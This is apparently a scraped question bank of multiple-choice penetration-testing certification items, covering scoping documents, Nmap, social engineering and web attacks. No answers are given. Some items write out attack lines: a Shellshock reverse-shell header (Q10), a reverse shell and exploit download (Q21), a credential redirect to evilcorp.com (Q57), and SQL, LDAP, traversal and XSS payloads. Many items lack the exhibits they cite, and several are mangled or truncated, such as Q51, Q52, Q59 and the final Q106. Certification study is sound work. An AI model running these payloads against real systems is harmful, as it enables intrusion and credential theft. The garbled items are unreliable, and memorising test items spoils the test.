Question # 4

Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?

A.

NDA

B.

MSA

C.

SOW

D.

MOU

Question # 5

A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company’s employees.

Which of the following tools can help the tester achieve this goal?

A.

Metasploit

B.

Hydra

C.

SET

D.

WPScan

Question # 6

You are a penetration tester running port scans on a server.

INSTRUCTIONS

Part 1: Given the output, construct the command that was used to generate this output from the available options.

Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Question # 7

A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:

Which of the following tools will help the tester prepare an attack for this scenario?

A.

Hydra and crunch

B.

Netcat and cURL

C.

Burp Suite and DIRB

D.

Nmap and OWASP ZAP

Question # 8

Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

A.

Buffer overflows

B.

Cross-site scripting

C.

Race-condition attacks

D.

Zero-day attacks

E.

Injection flaws

F.

Ransomware attacks

Question # 9

A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are:

Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

A.

Edit the discovered file with one line of code for remote callback

B.

Download .pl files and look for usernames and passwords

C.

Edit the smb.conf file and upload it to the server

D.

Download the smb.conf file and look at configurations

Question # 10

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:

exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}

Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

A.

exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}

B.

exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"}

C.

exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}

D.

exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}

Question # 11

A penetration tester conducts an Nmap scan against a target and receives the following results:

Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target?

A.

Nessus

B.

ProxyChains

C.

OWASP ZAP

D.

Empire

Question # 12

When preparing for an engagement with an enterprise organization, which of the following is one of the MOST important items to develop fully prior to beginning the penetration testing activities?

A.

Clarify the statement of work.

B.

Obtain an asset inventory from the client.

C.

Interview all stakeholders.

D.

Identify all third parties involved.

Question # 13

A penetration tester is examining a Class C network to identify active systems quickly. Which of the following commands should the penetration tester use?

A.

nmap -sn 192.168.0.1/16

B.

nmap -sn 192.168.0.1-254

C.

nmap -sn 192.168.0.1 192.168.0.1.254

D.

nmap -sN 192.168.0.0/24

Question # 14

A compliance-based penetration test is primarily concerned with:

A.

obtaining PII from the protected network.

B.

bypassing protection on edge devices.

C.

determining the efficacy of a specific set of security standards.

D.

obtaining specific information from the protected network.

Question # 15

A company recruited a penetration tester to configure wireless IDS over the network. Which of the following tools would BEST test the effectiveness of the wireless IDS solutions?

A.

Aircrack-ng

B.

Wireshark

C.

Wifite

D.

Kismet

Question # 16

Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report?

A.

S/MIME

B.

FTPS

C.

DNSSEC

D.

AS2

Question # 17

A company that develops embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse-engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company's request?

A.

The reverse-engineering team may have a history of selling exploits to third parties.

B.

The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.

C.

The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.

D.

The reverse-engineering team will be given access to source code for analysis.

Question # 18

A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal?

A.

RFID cloning

B.

RFID tagging

C.

Meta tagging

D.

Tag nesting

Question # 19

A penetration tester who is performing a physical assessment of a company’s security practices notices the company does not have any shredders inside the office building. Which of the following techniques would be BEST to use to gain confidential information?

A.

Badge cloning

B.

Dumpster diving

C.

Tailgating

D.

Shoulder surfing

Question # 20

A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

A.

nmap 192.168.1.1-5 -PU22-25,80

B.

nmap 192.168.1.1-5 -PA22-25,80

C.

nmap 192.168.1.1-5 -PS22-25,80

D.

nmap 192.168.1.1-5 -Ss22-25,80

Question # 21

A penetration tester ran the following command on a staging server:

python -m SimpleHTTPServer 9891

Which of the following commands could be used to download a file named exploit to a target machine for execution?

A.

nc 10.10.51.50 9891 < exploit

B.

powershell -exec bypass -f \\10.10.51.50\9891

C.

bash -i >& /dev/tcp/10.10.51.50/9891 0&1>/exploit

D.

wget 10.10.51.50:9891/exploit

Question # 22

A penetration tester is working on a scoping document with a new client. The methodology the client uses includes the following:

  • Pre-engagement interaction (scoping and ROE)
  • Intelligence gathering (reconnaissance)
  • Threat modeling
  • Vulnerability analysis
  • Exploitation and post exploitation
  • Reporting

Which of the following methodologies does the client use?

A.

OWASP Web Security Testing Guide

B.

PTES technical guidelines

C.

NIST SP 800-115

D.

OSSTMM

Question # 23

A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps should the tester take NEXT?

A.

Send deauthentication frames to the stations.

B.

Perform jamming on all 2.4GHz and 5GHz channels.

C.

Set the malicious AP to broadcast within dynamic frequency selection channels.

D.

Modify the malicious AP configuration to not use a pre-shared key.

Question # 24

A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data.

Which of the following should the tester verify FIRST to assess this risk?

A.

Whether sensitive client data is publicly accessible

B.

Whether the connection between the cloud and the client is secure

C.

Whether the client's employees are trained properly to use the platform

D.

Whether the cloud applications were developed using a secure SDLC

Question # 25

A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client’s IP address. The tester later discovered the SOC had used sinkholing on the penetration tester’s IP address. Which of the following BEST describes what happened?

A.

The penetration tester was testing the wrong assets

B.

The planning process failed to ensure all teams were notified

C.

The client was not ready for the assessment to start

D.

The penetration tester had incorrect contact information

Question # 26

PCI DSS requires which of the following as part of the penetration-testing process?

A.

The penetration tester must have cybersecurity certifications.

B.

The network must be segmented.

C.

Only externally facing systems should be tested.

D.

The assessment must be performed during non-working hours.

Question # 27

A penetration tester has gained access to part of an internal network and wants to exploit on a different network segment. Using Scapy, the tester runs the following command:

Which of the following represents what the penetration tester is attempting to accomplish?

A.

DNS cache poisoning

B.

MAC spoofing

C.

ARP poisoning

D.

Double-tagging attack

Question # 28

A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site. Which of the following recommendations would BEST address this situation?

A.

Implement a recurring cybersecurity awareness education program for all users.

B.

Implement multifactor authentication on all corporate applications.

C.

Restrict employees from web navigation by defining a list of unapproved sites in the corporate proxy.

D.

Implement an email security gateway to block spam and malware from email communications.

Question # 29

A penetration tester gains access to a system and is able to migrate to a user process:

Given the output above, which of the following actions is the penetration tester performing? (Choose two.)

A.

Redirecting output from a file to a remote system

B.

Building a scheduled task for execution

C.

Mapping a share to a remote system

D.

Executing a file on the remote system

E.

Creating a new process on all domain systems

F.

Setting up a reverse shell from a remote system

G.

Adding an additional IP address on the compromised system

Question # 30

A penetration tester joins the assessment team in the middle of the assessment. The client has asked the team, both verbally and in the scoping document, not to test the production networks. However, the new tester is not aware of this request and proceeds to perform exploits in the production environment. Which of the following would have MOST effectively prevented this misunderstanding?

A.

Prohibiting exploitation in the production environment

B.

Requiring all testers to review the scoping document carefully

C.

Never assessing the production networks

D.

Prohibiting testers from joining the team during the assessment

Question # 31

Which of the following is the MOST important information to have on a penetration testing report that is written for the developers?

A.

Executive summary

B.

Remediation

C.

Methodology

D.

Metrics and measures

Question # 32

The following output is from reconnaissance on a public-facing banking website:

Based on these results, which of the following attacks is MOST likely to succeed?

A.

A birthday attack on 64-bit ciphers (Sweet32)

B.

An attack that breaks RC4 encryption

C.

An attack on a session ticket extension (Ticketbleed)

D.

A Heartbleed attack

Question # 33

A penetration tester ran a simple Python-based scanner. The following is a snippet of the code:

Which of the following BEST describes why this script triggered a `probable port scan` alert in the organization's IDS?

A.

sock.settimeout(20) on line 7 caused each next socket to be created every 20 milliseconds.

B.

*range(1, 1025) on line 1 populated the portList list in numerical order.

C.

Line 6 uses socket.SOCK_STREAM instead of socket.SOCK_DGRAM

D.

The remoteSvr variable has neither been type-hinted nor initialized.

Question # 34

A company requires that all hypervisors have the latest available patches installed. Which of the following would BEST explain the reason why this policy is in place?

A.

To provide protection against host OS vulnerabilities

B.

To reduce the probability of a VM escape attack

C.

To fix any misconfigurations of the hypervisor

D.

To enable all features of the hypervisor

Question # 35

A penetration tester has established an on-path position between a target host and local network services but has not been able to establish an on-path position between the target host and the Internet. Regardless, the tester would like to subtly redirect HTTP connections to a spoofed server IP. Which of the following methods would BEST support the objective?

A.

Gain access to the target host and implant malware specially crafted for this purpose.

B.

Exploit the local DNS server and add/update the zone records with a spoofed A record.

C.

Use the Scapy utility to overwrite name resolution fields in the DNS query response.

D.

Proxy HTTP connections from the target host to that of the spoofed host.

Question # 36

Which of the following types of assessments MOST likely focuses on vulnerabilities with the objective to access specific data?

A.

An unknown-environment assessment

B.

A known-environment assessment

C.

A red-team assessment

D.

A compliance-based assessment

Question # 37

A physical penetration tester needs to get inside an organization's office and collect sensitive information without acting suspiciously or being noticed by the security guards. The tester has observed that the company's ticket gate does not scan the badges, and employees leave their badges on the table while going to the restroom. Which of the following techniques can the tester use to gain physical access to the office? (Choose two.)

A.

Shoulder surfing

B.

Call spoofing

C.

Badge stealing

D.

Tailgating

E.

Dumpster diving

F.

Email phishing

Question # 38

A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:

Which of the following combinations of tools would the penetration tester use to exploit this script?

A.

Hydra and crunch

B.

Netcat and cURL

C.

Burp Suite and DIRB

D.

Nmap and OWASP ZAP

Question # 39

A penetration tester receives the following results from an Nmap scan:

Which of the following OSs is the target MOST likely running?

A.

CentOS

B.

Arch Linux

C.

Windows Server

D.

Ubuntu

Question # 40

During an internal penetration test against a company, a penetration tester was able to navigate to another part of the network and locate a folder containing customer information such as addresses, phone numbers, and credit card numbers. To be PCI compliant, which of the following should the company have implemented to BEST protect this data?

A.

Vulnerability scanning

B.

Network segmentation

C.

System hardening

D.

Intrusion detection

Question # 41

During a web application test, a penetration tester was able to navigate to https://company.com and view all links on the web page. After manually reviewing the pages, the tester used a web scanner to automate the search for vulnerabilities. When returning to the web application, the following message appeared in the browser: unauthorized to view this page. Which of the following BEST explains what occurred?

A.

The SSL certificates were invalid.

B.

The tester IP was blocked.

C.

The scanner crashed the system.

D.

The web page was not found.

Question # 42

After compromising a system, a penetration tester wants more information in order to decide what actions to take next. The tester runs the following commands:

Which of the following attacks is the penetration tester most likely trying to perform?

A.

Metadata service attack

B.

Container escape techniques

C.

Credential harvesting

D.

Resource exhaustion

Question # 43

Which of the following tools would be BEST suited to perform a manual web application security assessment? (Choose two.)

A.

OWASP ZAP

B.

Nmap

C.

Nessus

D.

BeEF

E.

Hydra

F.

Burp Suite

Question # 44

A penetration tester captured the following traffic during a web-application test:

Which of the following methods should the tester use to visualize the authorization information being transmitted?

A.

Decode the authorization header using UTF-8.

B.

Decrypt the authorization header using bcrypt.

C.

Decode the authorization header using Base64.

D.

Decrypt the authorization header using AES.

Question # 45

A penetration tester has extracted password hashes from the lsass.exe memory process. Which of the following should the tester perform NEXT to pass the hash and provide persistence with the newly acquired credentials?

A.

Use Patator to pass the hash and Responder for persistence.

B.

Use Hashcat to pass the hash and Empire for persistence.

C.

Use a bind shell to pass the hash and WMI for persistence.

D.

Use Mimikatz to pass the hash and PsExec for persistence.

Question # 46

A penetration tester has gained access to the Chief Executive Officer's (CEO's) internal, corporate email. The next objective is to gain access to the network.

Which of the following methods will MOST likely work?

A.

Try to obtain the private key used for S/MIME from the CEO's account.

B.

Send an email from the CEO's account, requesting a new account.

C.

Move laterally from the mail server to the domain controller.

D.

Attempt to escalate privileges on the mail server to gain root access.

Question # 47

A penetration tester is conducting an authorized, physical penetration test to attempt to enter a client's building during non-business hours. Which of the following are MOST important for the penetration tester to have during the test? (Choose two.)

A.

A handheld RF spectrum analyzer

B.

A mask and personal protective equipment

C.

Caution tape for marking off insecure areas

D.

A dedicated point of contact at the client

E.

The paperwork documenting the engagement

F.

Knowledge of the building's normal business hours

Question # 48

A penetration tester is cleaning up and covering tracks at the conclusion of a penetration test. Which of the following should the tester be sure to remove from the system? (Choose two.)

A.

Spawned shells

B.

Created user accounts

C.

Server logs

D.

Administrator accounts

E.

Reboot system

F.

ARP cache

Question # 49

During an assessment, a penetration tester found a suspicious script that could indicate a prior compromise. While reading the script, the penetration tester noticed the following lines of code:

Which of the following was the script author trying to do?

A.

Spawn a local shell.

B.

Disable NIC.

C.

List processes.

D.

Change the MAC address

Question # 50

A penetration tester, who is doing an assessment, discovers an administrator has been exfiltrating proprietary company information. The administrator offers to pay the tester to keep quiet. Which of the following is the BEST action for the tester to take?

A.

Check the scoping document to determine if exfiltration is within scope.

B.

Stop the penetration test.

C.

Escalate the issue.

D.

Include the discovery and interaction in the daily report.

Question # 51

A penetration tester wrote the following Bash script to brute force a local service password:

..ting as expected. Which of the following changes should the penetration tester make to get the script to work?

A.

..e

cho "The correct password is $p" && break)

ho "The correct password is $p" || break

B.

.e

cho "The correct password is $p" && break)

o "The correct password is $p" | break

C.

e

cho "The correct password is $p" && break)

echo "The correct password is $p" && break)

D.

.

{ echo "The correct password is $p" && break )

With

E.

( echo "The correct password is $p" && break )

Question # 52

A penetration tester is conducting an unknown environment test and gathering additional information that can be used for later stages of an assessment. Which of the following would most likely produce useful information for additional testing?

A.

Searching for code repositories associated with a developer who previously worked for the target company code repositories associated with the

B.

Searching for code repositories target company's organization

C.

Searching for code repositories associated with the target company's organization

D.

Searching for code repositories associated with a developer who previously worked for the target company

Question # 53

A penetration tester writes the following script:

Which of the following is the tester performing?

A.

Searching for service vulnerabilities

B.

Trying to recover a lost bind shell

C.

Building a reverse shell listening on specified ports

D.

Scanning a network for specific open ports

Question # 54

A penetration tester wants to find hidden information in documents available on the web at a particular domain. Which of the following should the penetration tester use?

A.

Netcraft

B.

CentralOps

C.

Responder

D.

FOCA

Question # 55

A security firm has been hired to perform an external penetration test against a company. The only information the firm received was the company name. Which of the following passive reconnaissance approaches would be MOST likely to yield positive initial results?

A.

Specially craft and deploy phishing emails to key company leaders.

B.

Run a vulnerability scan against the company's external website.

C.

Runtime the company's vendor/supply chain.

D.

Scrape web presences and social-networking sites.

Question # 56

A penetration tester opened a shell on a laptop at a client's office but is unable to pivot because of restrictive ACLs on the wireless subnet. The tester is also aware that all laptop users have a hard-wired connection available at their desks. Which of the following is the BEST method available to pivot and gain additional access to the network?

A.

Set up a captive portal with embedded malicious code.

B.

Capture handshakes from wireless clients to crack.

C.

Span deauthentication packets to the wireless clients.

D.

Set up another access point and perform an evil twin attack.

Question # 57

For a penetration test engagement, a security engineer decides to impersonate the IT help desk. The security engineer sends a phishing email containing an urgent request for users to change their passwords and a link to https://example.com/index.html. The engineer has designed the attack so that once the users enter the credentials, the index.html page takes the credentials and then forwards them to another server that the security engineer is controlling. Given the following information:

Which of the following lines of code should the security engineer add to make the attack successful?

A.

window.location.= 'https://evilcorp.com '

B.

crossDomain: true

C.

geturlparameter ('username')

D.

redirectUrl = 'https://example.com '

Question # 58

During the assessment of a client's cloud and on-premises environments, a penetration tester was able to gain ownership of a storage object within the cloud environment using the provided on-premises credentials. Which of the following best describes why the tester was able to gain access?

A.

Federation misconfiguration of the container

B.

Key mismanagement between the environments

C.

IaaS failure at the provider

D.

Container listed in the public domain

Question # 59

While performing the scanning phase of a penetration test, the penetration tester runs the following command:

........v -sV -p- 10.10.10.23-28

....ip scan is finished, the penetration tester notices all hosts seem to be down. Which of the following options should the penetration tester try next?

A.

-sU

B.

-Pn

C.

-sn

D.

-sS

Question # 60

The output from a penetration testing tool shows 100 hosts contained findings due to improper patch management. Which of the following did the penetration tester perform?

A.

A vulnerability scan

B.

A WHOIS lookup

C.

A packet capture

D.

An Nmap scan

Question # 61

A penetration tester is developing exploits to attack multiple versions of a common software package. The versions have different menus and ... they have a common log-in screen that the exploit must use. The penetration tester develops code to perform the log-in that can be used by each of the exploits targeted to a specific version. Which of the following terms is used to describe this common log-in code example?

A.

Conditional

B.

Library

C.

Dictionary

D.

Sub application

Question # 62

A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?

A.

nmap -vv sUV -p 53, 123-159 10.10.1.20/24 -oA udpscan

B.

nmap -vv sUV -p 53,123,161-162 10.10.1.20/24 -oA udpscan

C.

nmap -vv sUV -p 53,137-139,161-162 10.10.1.20/24 -oA udpscan

D.

nmap -vv sUV -p 53, 122-123, 160-161 10.10.1.20/24 -oA udpscan

Question # 63

The following PowerShell snippet was extracted from a log of an attacker machine:

A penetration tester would like to identify the presence of an array. Which of the following line numbers would define the array?

A.

Line 8

B.

Line 13

C.

Line 19

D.

Line 20

Question # 64

A penetration tester is conducting a penetration test. The tester obtains a root-level shell on a Linux server and discovers the following data in a file named password.txt in the /home/svsacct directory:

U3VQZXIkM2NyZXQhCg==

Which of the following commands should the tester use NEXT to decode the contents of the file?

A.

echo U3VQZXIkM2NyZXQhCg== | base64 -d

B.

tar zxvf password.txt

C.

hydra -l svsacct -p U3VQZXIkM2NyZXQhCg== ssh://192.168.1.0/24

D.

john --wordlist /usr/share/seclists/rockyou.txt password.txt

Question # 65

The provision that defines the level of responsibility between the penetration tester and the client for preventing unauthorized disclosure is found in the:

A.

NDA

B.

SLA

C.

MSA

D.

SOW

Question # 66

A penetration tester wrote the following comment in the final report: "Eighty-five percent of the systems tested were found to be prone to unauthorized access from the internet." For which of the following audiences was this message intended?

A.

Systems administrators

B.

C-suite executives

C.

Data privacy ombudsman

D.

Regulatory officials

Question # 67

Which of the following is the BEST resource for obtaining payloads against specific network infrastructure products?

A.

Exploit-DB

B.

Metasploit

C.

Shodan

D.

Retina

Question # 68

Given the following script:

while True:
    print("Hello World")

Which of the following describes True?

A.

A while loop

B.

A conditional

C.

A Boolean operator

D.

An arithmetic operator

Question # 69

A penetration tester successfully performed an exploit on a host and was able to hop from VLAN 100 to VLAN 200. VLAN 200 contains servers that perform financial transactions, and the penetration tester now wants the local interface of the attacker machine to have a static ARP entry in the local cache. The attacker machine has the following:

IP Address: 192.168.1.63

Physical Address: 60-36-dd-a6-c5-33

Which of the following commands would the penetration tester MOST likely use in order to establish a static ARP entry successfully?

A.

tcpdump -i eth01 arp and arp[6:2] == 2

B.

arp -s 192.168.1.63 60-36-DD-A6-C5-33

C.

ipconfig /all findstr /v 00-00-00 | findstr Physical

D.

route add 192.168.1.63 mask 255.255.255.255.0 192.168.1.1

Question # 70

During a test of a custom-built web application, a penetration tester identifies several vulnerabilities. Which of the following would be the most interested in the steps to reproduce these vulnerabilities?

A.

Operations staff

B.

Developers

C.

Third-party stakeholders

D.

C-suite executives

Question # 71

A penetration tester wrote the following script on a compromised system:

#!/bin/bash
network='10.100.100'
ports='22 23 80 443'
for x in {1..254};
do (nc -zv $network.$x $ports );
done

Which of the following would explain using this script instead of another tool?

A.

The typical tools could not be used against Windows systems.

B.

The configuration required the penetration tester to not utilize additional files.

C.

The Bash script will provide more thorough output.

D.

The penetration tester wanted to persist this script to run on reboot.

Question # 72

Which of the following tools would be the best to use to intercept an HTTP response of an API, change its content, and forward it back to the origin mobile device?

A.

Drozer

B.

Burp Suite

C.

Android SDK Tools

D.

MobSF

Question # 73

A penetration tester requested, without express authorization, that a CVE number be assigned for a new vulnerability found on an internal client application. Which of the following did the penetration tester most likely breach?

A.

ROE

B.

SLA

C.

NDA

D.

SOW

Question # 74

A penetration tester is conducting an assessment of an organization that has both a web and mobile application. While testing the user profile page, the penetration tester notices that additional data is returned in the API response, which is not displayed in the web user interface. Which of the following is the most effective technique to extract sensitive user data?

A.

Compare PII from data leaks to publicly exposed user profiles.

B.

Target the user profile page with a denial-of-service attack.

C.

Target the user profile page with a reflected XSS attack.

D.

Compare the API response fields to GUI fields looking for PII.

Question # 75

A penetration tester is working to enumerate the PLC devices on the 10.88.88.76/24 network. Which of the following commands should the tester use to achieve the objective in a way that minimizes the risk of affecting the PLCs?

A.

nmap --script=s7-info -p 102 10.88.88.76/24 -T3

B.

nmap --script=wsdd-discover -p 3702 -sU 10.88.88.76/24

C.

nmap --script=iax2-version -p 4569 -sU -V 10.88.88.76/24 -T2

D.

nmap --script=x11-access -p 6000-6009 10.88.88.76/24

Question # 76

A penetration tester is performing a vulnerability scan on a large ATM network. One of the organization's requirements is that the scan does not affect legitimate clients' usage of the ATMs. Which of the following should the tester do to best meet the company's vulnerability scan requirements?

A.

Use Nmap's -T2 switch to run a slower scan and with less resources.

B.

Run the scans using multiple machines.

C.

Run the scans only during lunch hours.

D.

Use Nmap's --host-timeout switch to skip unresponsive targets.

Question # 77

During a code review assessment, a penetration tester finds the following vulnerable code inside one of the web application files:

<% String id = request.getParameter("id"); %>

Employee ID: <%= id %>

Which of the following is the best remediation to prevent a vulnerability from being exploited, based on this code?

A.

Parameterized queries

B.

Patch application

C.

Output encoding

Question # 78

A penetration tester wants to accomplish ARP poisoning as part of an attack. Which of the following tools will the tester most likely utilize?

A.

Wireshark

B.

Netcat

C.

Nmap

D.

Ettercap

Question # 79

Which of the following best explains why communication is a vital phase of a penetration test?

A.

To discuss situational awareness

B.

To build rapport with the emergency contact

C.

To explain the data destruction process

D.

To ensure the likelihood of future assessments

Question # 80

Which of the following describes how a penetration tester could prioritize findings in a report?

A.

Business mission and goals

B.

Cyberassets

C.

Network infrastructure

D.

Cyberthreats

Question # 81

Given the following Nmap scan command:

[root@kali ~]# nmap 192.168.0.* --exclude 192.168.0.101

Which of the following is the total number of servers that Nmap will attempt to scan?

A.

1

B.

101

C.

255

D.

256

Question # 82

During a security assessment, a penetration tester decides to write the following Python script:

import requests

x = ['OPTIONS', 'TRACE', 'TEST']

for y in x:
    z = requests.request(y, 'http://server.net')
    print(y, z.status_code, z.reason)

Which of the following is the penetration tester trying to accomplish? (Select two).

A.

Web server denial of service

B.

HTTP methods availability

C.

Web application firewall detection

D.

Web server fingerprinting

E.

Web server error handling

F.

Web server banner grabbing

Question # 83

During a vulnerability scanning phase, a penetration tester wants to execute an Nmap scan using custom NSE scripts stored in the following folder:

/home/user/scripts

Which of the following commands should the penetration tester use to perform this scan?

A.

nmap resume "not intrusive"

B.

nmap script default safe

C.

nmap --script /home/user/scripts

D.

nmap --load /home/user/scripts

Question # 84

Which of the following would be the most efficient way to write a Python script that interacts with a web application?

A.

Create a class for requests.

B.

Write a function for requests.

C.

Import the requests library.

D.

Use the cURL OS command.

Question # 85

A company developed a new web application to allow its customers to submit loan applications. A penetration tester is reviewing the application and discovers that the application was developed in ASP and used MSSQL for its back-end database. Using the application's search form, the penetration tester inputs the following code in the search input field:

<IMG SRC=vbscript:msgbox("Vulnerable_to_Attack");>

When the tester clicks the submit button on the search form, the web browser returns a pop-up window that displays "Vulnerable_to_Attack." Which of the following vulnerabilities did the tester discover in the web application?

A.

SQL injection

B.

Command injection

C.

Cross-site request forgery

D.

Cross-site scripting

Question # 86

In Java and C/C++, variable initialization is critical because:

A.

the unknown value, when used later, will cause unexpected behavior.

B.

the compiler will assign null to the variable, which will cause warnings and errors.

C.

the initial state of the variable creates a race condition.

D.

the variable will not have an object type assigned to it.

Question # 87

Which of the following tools would be best to use to conceal data in various kinds of image files?

A.

Kismet

B.

Snow

C.

Responder

D.

Metasploit

Question # 88

During a vulnerability scan a penetration tester enters the following Nmap command against all of the non-Windows clients:

nmap -sX -T4 -p 21-25,67,80,139,8080 192.168.11.191

The penetration tester reviews the packet capture in Wireshark and notices that the target responds with an RST packet flag set for all of the targeted ports. Which of the following does this information most likely indicate?

A.

All of the ports in the target range are closed.

B.

Nmap needs more time to scan the ports in the target range.

C.

The ports in the target range cannot be scanned because they are common UDP ports.

D.

All of the ports in the target range are open

Question # 89

During an assessment for a client organization, a penetration tester notices that numerous outdated software package versions were installed ...s-critical servers. Which of the following would best mitigate this issue?

A.

Implementation of patching and change control programs

B.

Revision of client scripts used to perform system updates

C.

Remedial training for the client's systems administrators

D.

Refrainment from patching systems until quality assurance approves

Question # 90

An external consulting firm is hired to perform a penetration test and must keep the confidentiality of the security vulnerabilities and the private data found in a customer's systems. Which of the following documents addresses this requirement?

A.

ROE

B.

NDA

C.

MOU

D.

SLA

Question # 91

A client asks a penetration tester to retest its network a week after the scheduled maintenance window. Which of the following is the client attempting to do?

A.

Determine if the tester was proficient.

B.

Test a new non-public-facing server for vulnerabilities.

C.

Determine if the initial report is complete.

D.

Test the efficacy of the remediation effort.

Question # 92

An organization's Chief Information Security Officer debates the validity of a critical finding from a penetration assessment that was completed six months ago. Which of the following post-report delivery activities would have most likely prevented this scenario?

A.

Client acceptance

B.

Data destruction process

C.

Attestation of findings

D.

Lessons learned

Question # 93

A penetration tester wants to find the password for any account in the domain without locking any of the accounts. Which of the following commands should the tester use?

A.

enum4linux -u user1 -p /passwordList.txt 192.168.0.1

B.

enum4linux -u user1 -p Password1 192.168.0.1

C.

cme smb 192.168.0.0/24 -u /userList.txt -p /passwordList.txt

D.

cme smb 192.168.0.0/24 -u /userList.txt -p Summer123

Question # 94

A penetration tester is performing an assessment for an application that is used by large organizations operating in the heavily regulated financial services industry. The penetration tester observes that the default Admin User account is enabled and appears to be used several times a day by unfamiliar IP addresses. Which of the following is the most appropriate way to remediate this issue?

A.

Increase password complexity.

B.

Implement system hardening.

C.

Restrict simultaneous user log-ins.

D.

Require local network access.

Question # 95

A penetration tester managed to exploit a vulnerability using the following payload:

IF (1=1) WAITFOR DELAY '0:0:15'

Which of the following actions would best mitigate this type of attack?

A.

Encrypting passwords

B.

Parameterizing queries

C.

Encoding output

D.

Sanitizing HTML

Question # 96

An executive needs to use Wi-Fi to connect to the company's server while traveling. While looking for available Wi-Fi connections, the executive notices an available access point to a hotel chain that is not available where the executive is staying. Which of the following attacks is the executive most likely experiencing?

A.

Data modification

B.

Amplification

C.

Captive portal

D.

Evil twin

Question # 97

A penetration tester approaches a company employee in the smoking area and starts a conversation about the company's recent social event. After a few minutes, the employee holds the badge-protected door open for the penetration tester and both enter the company's building. Which of the following attacks did the penetration tester perform?

A.

Dumpster diving

B.

Phishing

C.

Badge cloning

D.

Tailgating

Question # 98

A penetration tester executes the following Nmap command and obtains the following output:

Which of the following commands would best help the penetration tester discover an exploitable service?


A.

nmap -v -p 25 --script smtp-enum-users remotehost

B.

nmap -v --script=mysql-info.nse remotehost

C.

nmap --script=smb-brute.nse remotehost

D.

nmap -p 3306 --script "http*vuln*" remotehost

Question # 99

A penetration tester developed the following script to be used during an engagement:

#!/usr/bin/python

import socket, sys

ports = [21, 22, 23, 25, 80, 139, 443, 445, 3306, 3389]

if len(sys.argv) > 1:
    target = socket.gethostbyname(sys.argv[0])
else:
    print("Few arguments.")
    print("Syntax: python {} ".format(sys.argv[0]))
    sys.exit()

try:
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(2)
        result = s.connect_ex((target, port))
        if result == 0:
            print("Port {} is opened".format(port))
except KeyboardInterrupt:
    print("\nExiting ... ")
    sys.exit()

However, when the penetration tester ran the script, the tester received the following message:

socket.gaierror: [Errno -2] Name or service not known

Which of the following changes should the penetration tester implement to fix the script?

A.

From:

target = socket.gethostbyname(sys.argv[0])

To:

target = socket.gethostbyname(sys.argv[1])

B.

From:

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

To:

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

C.

From:

import socket, sys

To:

import socket

import sys

D.

From:

result = s.connect_ex((target, port))

To:

result = s.connect((target, port))

Question # 100

During an assessment, a penetration tester discovers the following code sample in a web application:

"(&(userid=*)(userid=*))(|(userid=*)(userPwd={SHA}a9993e364706816aba3e25717850c26c9cd0d89d==))

Which of the following injections is being performed?

A.

Boolean SQL

B.

Command

C.

Blind SQL

D.

LDAP

Question # 102

A penetration tester is reviewing the security of a web application running in an IaaS compute instance. Which of the following payloads should the tester send to get the running process credentials?

A.

file=http://192.168.1.78?+document.cookie

B.

file=../../../proc/self/environ

C.

file='%20or%2054365=54365;--

Question # 104

Within a Python script, a line that states print (var) outputs the following:

[{'1': 'CentOS', '2': 'Ubuntu'}, {'1': 'Windows 10', '2': 'Windows Server 2016'}]

Which of the following objects or data structures is var ?

A.

An array

B.

A class

C.

A dictionary

D.

A list

Question # 105

Which of the following is the most common vulnerability associated with IoT devices that are directly connected to the internet?

A.

Unsupported operating systems

B.

Susceptibility to DDoS attacks

C.

Inability to network

D.

The existence of default passwords

Question # 106

Which of the following is most important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience?

A.

Executive summary of the penetration-testing methods used

B.

Bill of materials including supplies, subcontracts, and costs incurred during assessment

C.

